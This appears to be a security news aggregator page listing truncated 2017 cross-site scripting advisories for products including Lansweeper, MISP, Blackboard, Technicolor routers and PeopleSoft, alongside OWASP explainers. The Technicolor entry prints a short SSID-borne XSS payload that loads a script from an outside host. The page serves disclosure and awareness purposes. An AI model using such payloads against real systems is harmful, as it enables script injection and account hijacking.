HackDig : Dig high-quality web security articles for hacker

CVE-2017-9292, Lansweeper 6.0.0.63 XSS vulnerability

=============================================
- Release date: October 05th, 2017
- Discovered by: Giovanni Cerrato, Giovanni Guido and BackBox team
- Severity: Medium
=============================================

I. VULNERABILITY
-------------------------
Lansweeper XSS vulnerability.

II. INTRODUCTION
-------------------------
Lansweeper is an Asset Management and Netw

Publish At: 2017-10-07 06:20 | Read: 759 | Comments: 0 | Tags: Xss Vulnerability

CSRF/XSS in Content Audit allowing an unauthenticated attacker to do almost anything an admin can (WordPress plugin)

Details
================
Software: Content Audit
Version: 1.9.1
Homepage: https://wordpress.org/plugins/content-audit/
Advisory report: https://security.dxw.com/advisories/csrf-xss-content-audit/
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)

Description
================
CSRF/XSS in Content Audit allowing an unauthenticated attacker to do almo

Publish At: 2017-09-27 05:40 | Read: 206 | Comments: 0 | Tags: Xss Csrf

Expert disclosed 10 zero-day vulnerabilities in D-Link DIR 850L wireless routers

The security researcher Pierre Kim has discovered ten critical zero-day vulnerabilities in D-Link DIR 850L routers and invites users to stop using them. The security researcher Pierre Kim has discovered ten critical zero-day vulnerabilities in routers from networking equipment manufacturer D-Link that open owners to cyber attacks. The flawed devices are the
Publish At: 2017-09-11 20:30 | Read: 340 | Comments: 0 | Tags: Breaking News Hacking backdoor D-Link DIR 850L wireless rout

EE 4GEE Multiple Security Vulnerabilities Advisory (CSRF/Stored XSS/JSONP)

EE 4GEE Wireless Router - Multiple Security Vulnerabilities Advisory
-------------------------------------------------
Hardware Version/Model: 4GEE WiFi MBB (EE60VB-2AE8G83).
Vulnerable Software Version: EE60_00_05.00_25.
Patched Software Version: EE60_00_05.00_31.
Product URL: https://shop.ee.co.uk/dongles/pay-monthly-mobile-broadband/4gee-wifi/details
Proof of Co

Publish At: 2017-09-08 11:20 | Read: 138 | Comments: 0 | Tags: Xss Csrf

Wibu Systems AG CodeMeter 6.50 - Persistent XSS Vulnerability

Document Title:
===============
Wibu Systems AG CodeMeter 6.50 - Persistent XSS Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2074
ID: FB49498
Acknowledgements: https://www.flickr.com/photos/vulnerabilitylab/36912680045/
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13754

CVE-ID:
=======
CVE-2017

Publish At: 2017-09-04 13:15 | Read: 254 | Comments: 0 | Tags: Xss Vulnerability

CVE-2017-13671 - MISP Stored XSS

Hi list,

We have found a Stored Cross-site scripting vulnerability in MISP (Malware Information Sharing Platform & Threat Sharing).

[Description]
Cross-site scripting (XSS) vulnerability in the comments of the events within MISP before 2.4.79 allows remote attackers to inject arbitrary web script or HTML via a POST request.
-----------------------------------

Publish At: 2017-08-29 08:40 | Read: 279 | Comments: 0 | Tags: Xss

OWASP Top 10 : Cross-Site Scripting #3 Bad JavaScript Imports

Need to include cross-domain resources: The ever-growing need to give website visitors a rich user experience has made it necessary for browsers to include cross-origin resources. These resources can be data, a frame, an image or JavaScript. For example, a website http://example.com can have the following cross-origin resources: Data from websit

Publish At: 2017-08-28 03:30 | Read: 151 | Comments: 0 | Tags: OWASP SecureLayer7 Lab Bad JavaScript Imports Client Side At

BlackBoard LMS (9.1.140152.0) Stored XSS/Arbitrary File Upload

Document Title:
===============
BlackBoard LMS 9.1 (9.1.140152.0) Stored XSS/Arbitrary File Upload

Product Description:
===============
The Learning Management System has changed the way students and educators interact. Blackboard's LMS solutions offer much more than simple classroom interaction; they support the entire education experience, enabling educators

Publish At: 2017-08-23 05:20 | Read: 212 | Comments: 0 | Tags: Xss

OWASP Top 10 #3: Cross-Site Scripting (XSS)

Cross-Site Scripting

Cross-site scripting (XSS) attacks involve the injection of malicious code into trusted websites. One of the traditional uses of XSS is an attacker stealing session cookies in order to impersonate another user. More recently it has been used to spread malware, deface websites, and phish for credentials. It occurs wh

Publish At: 2017-08-17 18:35 | Read: 176 | Comments: 0 | Tags: Security Awareness OWASP OWASP Top 10 Xss

What should enterprises know about how a stored XSS works

Cross-site scripting, or XSS, is a web application attack that attempts to inject malicious code into a vulnerable application. The application itself isn't at risk during this attack; the main purpose of XSS is to exploit the account or user of the application. There are a few different types of XSS -- such as stored, reflected and others -- but in this a

Publish At: 2017-08-17 08:58 | Read: 210 | Comments: 0 | Tags: Xss

[CVE-2017-11320] Persistent XSS through the SSID of nearby Wi-Fi devices on Technicolor TC7337

// Device : Technicolor TC7337
// Vulnerable URL : https://your.rou.ter.ip/wlscanresults.html
// XSS through SSID : '><script src=//url.co></script> ( Exactly 32 bytes u_u )
// ^
// 5-char domains are running | 'src' does not require quotes, and passing the URL with only '//'
// out, grab y

Publish At: 2017-08-03 08:15 | Read: 226 | Comments: 0 | Tags: Xss

CVE-2017-1500 - Reflected XSS in IBM WorkLight OAuth Server Web Api

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

☾ Reflected Cross-Site Scripting in IBM Worklight OAuth Server Web Api ☽
======== ☾ Table of Contents ☽ =========================================
0. Overview
1. Detailed Description
2. Proof Of Concept
3. Solution
4. Disclosure Timeline
5. Thanks & Acknowledgements
6. References
7. Credits
8. Legal No

Publish At: 2017-08-02 13:50 | Read: 200 | Comments: 0 | Tags: Xss

Stored XSS in Salutation Responsive WordPress + BuddyPress Theme could allow logged-in users to do almost anything an ad

Details
================
Software: Salutation Responsive WordPress + BuddyPress Theme
Version: 3.0.15
Homepage: https://themeforest.net/item/salutation-responsive-wordpress-buddypress-theme/548199
Advisory report: https://security.dxw.com/advisories/stored-xss-salutation-theme/
CVE: Awaiting assignment
CVSS: 4.9 (Medium; AV:N/AC:M/Au:S/C:P/I:P/A:N)

Description
======

Publish At: 2017-08-01 19:25 | Read: 273 | Comments: 0 | Tags: Xss

SEC Consult SA-20170724-0 :: Cross-Site Scripting (XSS) issue in multiple Ubiquiti Networks products

SEC Consult Vulnerability Lab Security Advisory < 20170724-0 >
=======================================================================
title: Cross-Site Scripting (XSS)
product: Ubiquiti Networks EP-R6, ER-X, ER-X-SFP
vulnerable version: Firmware v1.9.1
fixed version: Firmware v1.9.1.1
CVE number:
impact:

Publish At: 2017-07-24 18:45 | Read: 282 | Comments: 0 | Tags: Xss

Multiple XSS (POST request) Vulnerabilities in TestServlet (PeopleSoft)

1. ADVISORY INFORMATION
Title: Multiple XSS (POST request) Vulnerabilities in TestServlet (PeopleSoft)
Advisory ID: [ERPSCAN-17-037]
Advisory URL: https://erpscan.com/advisories/erpscan-17-037-multiple-xss-vulnerabilities-testservlet-peoplesoft/
Risk: Medium
Date published: 18.07.2017
Vendor contacted: Oracle

2. VULNERABILITY INFORMATION
Class: XSS [CWE-79]
Impact:

Publish At: 2017-07-20 22:21 | Read: 266 | Comments: 0 | Tags: Xss
